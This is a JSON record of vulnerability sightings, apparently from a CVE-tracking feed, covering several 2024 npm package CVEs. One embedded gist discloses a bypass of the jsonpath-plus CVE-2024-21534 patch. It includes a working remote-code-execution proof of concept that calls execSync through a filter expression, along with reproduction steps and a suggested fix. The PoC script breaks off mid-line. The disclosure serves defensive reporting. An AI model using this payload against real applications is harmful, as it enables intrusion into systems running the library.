{"vulnerability": "cve-2024-2153", "sightings": [{"uuid": "239c089d-6bb3-4294-a779-15f850161fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113445581318070567", "content": "", "creation_timestamp": "2024-11-08T05:03:15.990976Z"}, {"uuid": "71d517a0-23df-4bdc-b2a6-cee25c32b0c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/ton77v/932a3f8b5d57d2625b31328796a3cf30", "content": "", "creation_timestamp": "2025-02-01T06:22:08.000000Z"}, {"uuid": "538fd0b5-f8a1-47a5-8e4f-16291a1cc964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114006161366925881", "content": "", "creation_timestamp": "2025-02-15T05:06:08.831971Z"}, {"uuid": "d0f98758-194f-4a5f-bb59-5d7b58d77822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3li7o65dim32h", "content": "", "creation_timestamp": "2025-02-15T12:00:08.892779Z"}, {"uuid": "cfcdb0f1-ecb1-48b6-8af3-4b4fab27faac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3liawfmwhc72h", "content": "", "creation_timestamp": "2025-02-16T00:00:08.675265Z"}, {"uuid": "ab18baf8-2eac-477f-8ccd-cec6bc1fed49", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/gregory-hive/802f4c8c5bd5becc607c1b7ebd88fcaf", "content": "", "creation_timestamp": "2025-05-22T14:53:41.000000Z"}, {"uuid": "cfcba34c-a574-4342-ade6-2950ad633398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "f97e1e30-de69-4da3-a997-416c9e7aca60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/jrvssingh-cpu/5ca4be6b05f749c6962d84fae197cdc9", "content": "", "creation_timestamp": "2026-02-25T10:55:46.000000Z"}, {"uuid": "23fa0894-e494-4efe-be64-8b9348ec3e9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9172", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u9a8c\u8bc1\n\u63cf\u8ff0\uff1ajsonpath-plus \u5305\uff08\u7248\u672c &lt;=10.0.7\uff09\u5b58\u5728\u4e25\u91cd\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08RCE\uff09\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7 Node.js \u7684 VM \u6a21\u5757\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u8be5\u6f0f\u6d1e\u7531\u4e8e\u8f93\u5165\u9a8c\u8bc1\u4e0d\u4e25\u683c\u5bfc\u81f4\uff0c\u5f71\u54cd\u7248\u672c\u4e3a 10.0.7 \u4ee5\u4e0b\uff0cCVSS \u5206\u6570\u4e3a 
9.8\uff08\u6781\u5176\u4e25\u91cd\uff09\u3002\u6f0f\u6d1e\u9996\u6b21\u516c\u5f00\u4e8e 2024 \u5e74 10 \u6708 11 \u65e5\u3002\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-21534-poc\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u9a8c\u8bc1", "creation_timestamp": "2024-11-25T06:25:50.000000Z"}, {"uuid": "2bdfd131-5ea5-46bf-a98e-df706628474c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9224", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/ghostwirez/CVE-2024-39090-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-29T01:05:02.000000Z"}, {"uuid": "c9c3bd2b-be2e-4ec3-b903-2bc0dd0ed231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9221", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/verylazytech/cve-2024-21534\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-28T18:27:39.000000Z"}, {"uuid": "14b1d604-f7ee-425d-98ae-53e998f6e92e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4533", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat 
Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1302\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.\n\n**Note:**\n\nThis is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).\n\ud83d\udccf Published: 2025-02-15T06:30:51Z\n\ud83d\udccf Modified: 2025-02-15T06:30:51Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1302\n2. https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24ee\n3. https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456\n4. https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js%23L127\n5. https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585", "creation_timestamp": "2025-02-15T07:11:13.000000Z"}, {"uuid": "b08733ff-1cea-4d20-8523-3b4155266f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16797", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21538\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Versions of the package cross-spawn before 6.0.6, from 7.0.0 and before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. 
An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.\n\ud83d\udccf Published: 2024-11-08T05:00:04.695Z\n\ud83d\udccf Modified: 2025-05-19T03:13:17.431Z\n\ud83d\udd17 References:\n1. https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230\n2. https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-8366349\n3. https://github.com/moxystudio/node-cross-spawn/pull/160\n4. https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\n5. https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff", "creation_timestamp": "2025-05-19T03:38:21.000000Z"}, {"uuid": "f01931e1-da93-40fa-a540-b589d8c16711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://t.me/cvedetector/18161", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-1302 - Jsonpath-Plus Remote Code Execution (RCE)\", \n  \"Content\": \"CVE ID : CVE-2025-1302 \nPublished : Feb. 15, 2025, 5:15 a.m. | 2\u00a0hours, 2\u00a0minutes ago \nDescription : Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.  \n  \n**Note:**  \n  \nThis is caused by an incomplete fix for [CVE-2024-21534](). 
\nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-15T08:30:33.000000Z"}, {"uuid": "26f062c2-1ffc-41d1-9320-8698351a6961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21539", "type": "seen", "source": "https://t.me/cvedetector/11433", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21539 - EsLint Plugin Kit ReDoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21539 \nPublished : Nov. 19, 2024, 5:15 a.m. | 24\u00a0minutes ago \nDescription : Versions of the package @eslint/plugin-kit before 0.2.3 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by exploiting this vulnerability. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-19T06:46:39.000000Z"}, {"uuid": "90b92250-9679-4c64-bddd-89bbdb75f0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21537", "type": "seen", "source": "https://t.me/cvedetector/9488", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21537 - Lilconfig Arbitrary Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21537 \nPublished : Oct. 31, 2024, 5:15 a.m. 
| 35\u00a0minutes ago \nDescription : Versions of the package lilconfig from 3.1.0 and before 3.1.1 are vulnerable to Arbitrary Code Execution due to the insecure usage of eval in the dynamicImport function. An attacker can exploit this vulnerability by passing a malicious input through the defaultLoaders function. \nSeverity: 8.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"31 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-31T06:54:55.000000Z"}, {"uuid": "2b16e6ad-4a69-4c72-a9e6-bf291463adee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21536", "type": "seen", "source": "https://t.me/cvedetector/8353", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21536 - Apache http-proxy-middleware Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-21536 \nPublished : Oct. 19, 2024, 5:15 a.m. | 36\u00a0minutes ago \nDescription : Versions of the package http-proxy-middleware before 2.0.7, from 3.0.0 and before 3.0.3 are vulnerable to Denial of Service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths. 
\nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-19T07:58:03.000000Z"}, {"uuid": "4025a354-8538-4674-8282-dcbce26b0d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://t.me/cvedetector/10157", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21538 - Node.js Cross-Spawn ReDoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21538 \nPublished : Nov. 8, 2024, 5:15 a.m. | 40\u00a0minutes ago \nDescription : Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-08T07:09:24.000000Z"}, {"uuid": "56d892bf-4cf4-4060-a130-b1412603cd98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21533", "type": "seen", "source": "https://t.me/cvedetector/7313", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21533 - ggit Arbitrary Argument Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21533 \nPublished : Oct. 8, 2024, 5:15 a.m. 
| 27\u00a0minutes ago \nDescription : All versions of the package ggit are vulnerable to Arbitrary Argument Injection via the clone() API, which allows specifying the remote URL to clone and the file on disk to clone to. The library does not sanitize for user input or validate a given URL scheme, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:51:17.000000Z"}, {"uuid": "890cc480-cdea-4116-9588-f14ae1ffa732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21532", "type": "seen", "source": "https://t.me/cvedetector/7314", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21532 - Git executable Injection in ggit\", \n  \"Content\": \"CVE ID : CVE-2024-21532 \nPublished : Oct. 8, 2024, 5:15 a.m. | 27\u00a0minutes ago \nDescription : All versions of the package ggit are vulnerable to Command Injection via the fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API. 
\nSeverity: 7.3 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:51:18.000000Z"}, {"uuid": "8b7aae67-5893-4958-b9fa-473972be2ccb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21535", "type": "seen", "source": "https://t.me/cvedetector/7882", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21535 - Markdown-to-jsx Cross-site Scripting (XSS)\", \n  \"Content\": \"CVE ID : CVE-2024-21535 \nPublished : Oct. 15, 2024, 5:15 a.m. | 22\u00a0minutes ago \nDescription : Versions of the package markdown-to-jsx before 7.4.0 are vulnerable to Cross-site Scripting (XSS) via the src property due to improper input sanitization. An attacker can execute arbitrary code by injecting a malicious iframe element in the markdown. \nSeverity: 6.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-15T07:44:14.000000Z"}, {"uuid": "616e8430-e2bf-4fa8-820b-b1da5c9d5c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21530", "type": "seen", "source": "https://t.me/cvedetector/6802", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21530 - Cocoon Reusing Nonce Cryptography Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21530 \nPublished : Oct. 2, 2024, 5:15 a.m. 
| 40\u00a0minutes ago \nDescription : Versions of the package cocoon before 0.4.0 are vulnerable to Reusing a Nonce, Key Pair in Encryption when the encrypt, wrap, and dump functions are sequentially called. An attacker can generate the same ciphertext by creating a new encrypted message with the same cocoon object.  \n  \n**Note:**  \nThe issue does NOT affect objects created with Cocoon::new which utilizes ThreadRng. \nSeverity: 4.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"02 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-02T07:59:53.000000Z"}, {"uuid": "e51d1b99-cfc8-4ea7-9b59-67bea3a3e0c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21531", "type": "seen", "source": "https://t.me/cvedetector/6700", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21531 - Apache Git Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21531 \nPublished : Oct. 1, 2024, 5:15 a.m. | 24\u00a0minutes ago \nDescription : All versions of the package git-shallow-clone are vulnerable to Command injection due to missing sanitization or mitigation flags in the process variable of the gitShallowClone function. 
\nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"01 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-01T07:43:03.000000Z"}, {"uuid": "95e8c176-99eb-4ae1-af4b-09d9d766f0e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "Telegram/B6Ro0XJaa5S2akdaKXUWQAw0I4uY8L6ZTgeKaeLAe3cSfbhr", "content": "", "creation_timestamp": "2025-02-15T23:50:18.000000Z"}, {"uuid": "194f1915-7fde-4f29-bc74-5f12bbeee16e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "Telegram/WDhF5XevgqviS_8KCjmZ87T-69A_WAI0o-K_reZtmExyTW4", "content": "", "creation_timestamp": "2024-11-13T11:34:23.000000Z"}, {"uuid": "75aea043-7a2b-4616-9eef-0ee0bc21ed68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2153", "type": "seen", "source": "https://t.me/ctinow/198956", "content": "https://ift.tt/rUabhjA\nCVE-2024-2153", "creation_timestamp": "2024-03-04T02:26:52.000000Z"}, {"uuid": "3b34ff12-d0ab-4ff4-bd1c-cb9eb2edda9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2153", "type": "seen", "source": "https://t.me/ctinow/198951", "content": "https://ift.tt/rUabhjA\nCVE-2024-2153", "creation_timestamp": "2024-03-04T02:21:35.000000Z"}, {"uuid": "46e61159-2dd3-496a-95ba-6674f26359b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", 
"source": "https://gist.github.com/harikrishnankv/ea3e99b5227529d90b21799dfa214b79", "content": "# jsonpath-plus CVE-2024-21534 Patch Bypass \u2192 RCE\n\n**Package:** `jsonpath-plus`  \n**Affected version:** \u2264 10.4.0 (latest as of 2026-05-06)  \n**Weekly downloads:** ~10 million  \n**Type:** Incomplete patch bypass \u2192 Remote Code Execution  \n**Bypasses:** CVE-2024-21534 fix (`BLOCKED_PROTO_PROPERTIES`)  \n**Discovered:** 2026-05-06  \n\n---\n\n## What Is This\n\nCVE-2024-21534 was a critical RCE in jsonpath-plus where filter expressions\ncould access the `Function` constructor via prototype chain to execute arbitrary\ncode. The patch added `BLOCKED_PROTO_PROPERTIES` to block `constructor` access.\n\n**This bypass defeats that patch.** The fix has two flaws:\n\n1. **MemberExpression guard** \u2014 only blocks inherited `constructor`, not own\n2. **CallExpression guard** \u2014 dead code, identity check never fires\n\nLatest version (10.4.0) remains exploitable.\n\n---\n\n## Root Cause\n\n### Flaw 1 \u2014 evalMemberExpression (line 1313)\n\n```js\nconst BLOCKED_PROTO_PROPERTIES = new Set(['constructor', '__proto__', ...]);\n\n// Only blocks constructor when NOT an own property:\nif (!Object.hasOwn(obj, prop) &amp;&amp; BLOCKED_PROTO_PROPERTIES.has(prop)) {\n    throw TypeError(...)\n}\n//  ^^^ bypass: if data.users[0].constructor is OWN property,\n//              Object.hasOwn() = true \u2192 !true = false \u2192 NO throw\n\nconst result = obj[prop];          // = Function\nif (typeof result === 'function') {\n    return result.bind(obj);       // returns Function.bind(obj)\n}\n```\n\n### Flaw 2 \u2014 evalCallExpression (line 1343, dead code)\n\n```js\nif (func === Function) {\n    // Comment: \"unreachable since BLOCKED_PROTO_PROPERTIES includes 'constructor'\"\n    // \u2190 WRONG. 
Own property bypasses BLOCKED_PROTO_PROPERTIES.\n    // Even if reached: func = Function.bind(obj) \u2260 Function \u2192 check never fires.\n    throw new Error('Function constructor is disabled');\n}\n// func('return process')() executes freely\n```\n\n---\n\n## Proof of Concept\n\n```js\nconst { JSONPath } = require('jsonpath-plus'); // 10.4.0\n\n// Object where 'constructor' is an OWN property (not inherited)\n// Occurs after: msgpack/BSON deserialization, class-transformer,\n// Object.assign onto class instances, etc.\nconst data = {\n  users: [\n    {\n      name: 'alice',\n      constructor: Function   // own property \u2192 bypasses hasOwn check\n    }\n  ]\n};\n\n// Verify the bypass conditions:\nconsole.log(Object.hasOwn(data.users[0], 'constructor')); // true  \u2192 block skipped\nconsole.log(Function.bind({}) === Function);               // false \u2192 dead code guard\n\n// Filter expression escapes sandbox via own constructor\nJSONPath({\n  path: \"$.users[?(@.constructor('return process')().mainModule.require('child_process').execSync('id').toString())]\",\n  json: data\n});\n// Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n---\n\n## How to Reproduce\n\n```bash\n# 1. Clone / setup\nmkdir bypass-demo &amp;&amp; cd bypass-demo\nnpm init -y\nnpm install jsonpath-plus@10.4.0\n\n# 2. Run PoC\nnode poc.js\n```\n\nExpected output:\n```\njsonpath-plus version: 10.4.0\n\n[*] Object.hasOwn check:\n    Object.hasOwn(data.users[0], \"constructor\") = true\n\n[*] bind identity check:\n    Function.bind({}) === Function = false\n\n[*] Running JSONPath with malicious filter expression...\n\n[+] Matched items: [ 'alice' ]\n[+] OS command output: uid=0(root) gid=0(root) groups=0(root)\n\n[!] 
RCE confirmed on jsonpath-plus@10.4.0 (latest)\n```\n\n---\n\n## Attack Scenarios\n\n### When exploitable\n\n| Scenario | Exploitable |\n|----------|------------|\n| App queries deserialized msgpack/BSON data | \u2705 |\n| App uses `Object.assign(classInstance, userData)` then queries | \u2705 |\n| App uses class-transformer `plainToInstance` then queries | \u2705 |\n| User controls JSONPath path expression (original CVE vector) | \u2705 |\n| Pure `JSON.parse()` data, no reconstruction | \u274c |\n\n### Why JSON.parse is safe (but not enough)\n\n`JSON.parse` strips function references \u2014 `constructor` becomes a string,\nnot `Function`. However many real apps go through msgpack, BSON, or class\nreconstruction pipelines where function references survive.\n\n---\n\n## Two-Layer Bypass Summary\n\n```\nAttack data:  { constructor: Function }   \u2190 own property\n\nLayer 1 \u2014 MemberExpression:\n  Object.hasOwn(obj, 'constructor') = true\n  \u2192 !true &amp;&amp; BLOCKED.has('constructor')\n  \u2192 false &amp;&amp; true\n  \u2192 false  \u2190 NO THROW, constructor returned as Function.bind(obj)\n\nLayer 2 \u2014 CallExpression:\n  func = Function.bind(obj)\n  func === Function  \u2192  false  \u2190 dead code, never throws\n  func('return process')()     \u2190 executes freely\n```\n\n---\n\n## Suggested Fix\n\n```js\n// evalMemberExpression \u2014 also block own constructor that IS Function:\nconst result = obj[prop];\nif (BLOCKED_PROTO_PROPERTIES.has(prop)) {\n    throw new TypeError(`Property '${prop}' access is blocked`);\n}\n// OR strip constructor from data before evaluation\n\n// evalCallExpression \u2014 fix identity check for bound functions:\nif (func === Function || func.toString() === Function.toString()) {\n    throw new Error('Function constructor is disabled');\n}\n```\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2024 | CVE-2024-21534 published, patch released |\n| 2026-05-06 | Patch bypass discovered in v10.4.0 (latest) |\n| 
2026-05-06 | Reported to maintainers / Snyk |\n\n---\n\n## Report\n\n- https://github.com/JSONPath-Plus/JSONPath/security/advisories/new\n- https://snyk.io/vulnerability-disclosure\n- https://cveform.mitre.org\n\n\n/**\n * jsonpath-plus CVE-2024-21534 Patch Bypass \u2014 RCE PoC\n *\n * Affected : jsonpath-plus &lt;= 10.4.0 (latest as of 2026-05-06)\n * Downloads: ~10 million/week\n * Bypass of: CVE-2024-21534 patch (BLOCKED_PROTO_PROPERTIES)\n *\n * ROOT CAUSE\n * ----------\n * evalMemberExpression blocks constructor access only when NOT an own property:\n *\n *   if (!Object.hasOwn(obj, prop) &amp;&amp; BLOCKED_PROTO_PROPERTIES.has(prop)) throw\n *\n * When a data element has `constructor` as an OWN property (e.g. after\n * deserialization via msgpack/BSON/class-transformer or Object.assign on\n * class instances), Object.hasOwn() = true \u2192 block skipped \u2192 Function returned.\n *\n * Second guard in evalCallExpression is dead code:\n *\n *   if (func === Function) throw  // NEVER true:\n *                                 // func = Function.bind(obj) !== Function\n *\n * PRECONDITIONS\n * -------------\n * 1. App queries attacker-influenced data with JSONPath filter expressions\n * 2. 
Data passes through non-JSON serialization where Function refs survive\n *    (msgpack, BSON, class-transformer, Object.assign onto class instances)\n *    OR app uses user-controlled JSONPath path expressions (original CVE vector)\n *\n * REPRODUCE\n * ---------\n *   npm install jsonpath-plus@10.4.0\n *   node poc.js\n */\n\n'use strict';\nconst { JSONPath } = require('jsonpath-plus');\nconst { execSync } = require('child_process');\nconst fs = require('fs');\n\nconsole.log('jsonpath-plus version:', require('./node_modules/jsonpath-plus/package.json').version);\n\n// Step 1 \u2014 Simulate deserialization where constructor survives as own property\n// (msgpack, BSON, class-transformer, Object.assign on class instance, etc.)\nconst data = {\n  users: [\n    {\n      name: 'alice',\n      role: 'user',\n      constructor: Function   // own property \u2014 not inherited \u2014 bypasses hasOwn check\n    }\n  ]\n};\n\nconsole.log('\\n[*] Object.hasOwn check:');\nconsole.log('    Object.hasOwn(data.users[0], \"constructor\") =',\n  